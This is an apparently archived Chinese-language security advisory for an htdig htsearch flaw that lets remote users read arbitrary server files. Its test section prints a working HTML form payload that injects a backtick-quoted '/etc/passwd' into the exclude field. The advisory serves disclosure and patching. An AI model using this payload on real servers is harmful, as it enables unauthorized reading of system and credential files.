发布日期：2000-03-01
更新日期：2000-03-02

受影响系统：

htdig-3.1.4, 3.2.0b1以及更老的版本
          (http://www.htdig.org/)

描述：

---

任何远程用户可以以httpd用户的权限来浏览web服务器上的任意文件。

htsearch没有正确检查用户输入的数据。表单中的很多项都没有检查它的内容就直接
作为配置属性来处理了。htsearch允许配置文件包含进用反引号("`")引起的文件内容。
例如:

start_url: `/var/htdig/htdig.urls`

攻击者可以利用这个特点来将任意系统文件的内容调出浏览。

<* 来源:       -Geoff Hutchison
               Williams Students Online
               http://wso.williams.edu/
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

修改搜索表单中的exclude域或restrict域，比如：

<form method="get" action="http://victim/cgi-bin/htsearch">
<font size=-1>
<input type=hidden name=config value=valid_db>
<input type=hidden name=restrict value="">
<input type=hidden name=exclude value="`/etc/passwd`">
</form>

提交表单后，在搜索结果页面源码中的"exclude"(或"restrict")域将包含/etc/passwd
文件的内容。(注意上面的valid_db必须是有效的数据库文件)


建议：

---

htdig 3.1.5已经解决了这个问题。
htdig 3.2.0b1的用户应该更新到htdig-3.2.0b2-022700

您可以在http://www.htdig.org/得到最新的版本

浏览次数：6752
严重程度：0（网友投票）